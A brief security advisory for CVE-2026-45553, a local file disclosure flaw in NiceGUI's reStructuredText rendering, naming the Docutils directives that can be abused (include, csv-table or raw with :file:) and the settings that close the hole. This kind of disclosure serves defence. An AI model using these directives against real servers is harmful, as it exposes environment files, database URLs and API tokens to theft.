CVE-2026-45553

Name of the Vulnerable Software and Affected Versions NiceGUI (affected versions not specified)

Description The ui.restructured text() function renders reStructuredText server-side using Docutils without disabling file insertion directives. When attacker-controlled content is passed to this function, an attacker can use standard Docutils directives such as include, csv-table with :file:, or raw with :file: to read local files accessible by the server process. This occurs within the prepare content() function located in nicegui/elements/restructured text.py, which fails to disable file insertion or raw directives during the rendering process. This can lead to the disclosure of sensitive information, including environment files, database URLs, API tokens, and source files.

Recommendations Disable unsafe Docutils features in the prepare content() function by setting file insertion enabled to False, raw enabled to False, and disable config to True within the settings overrides parameter. As a temporary workaround, avoid passing untrusted or user-controlled input into the ui.restructured text() function.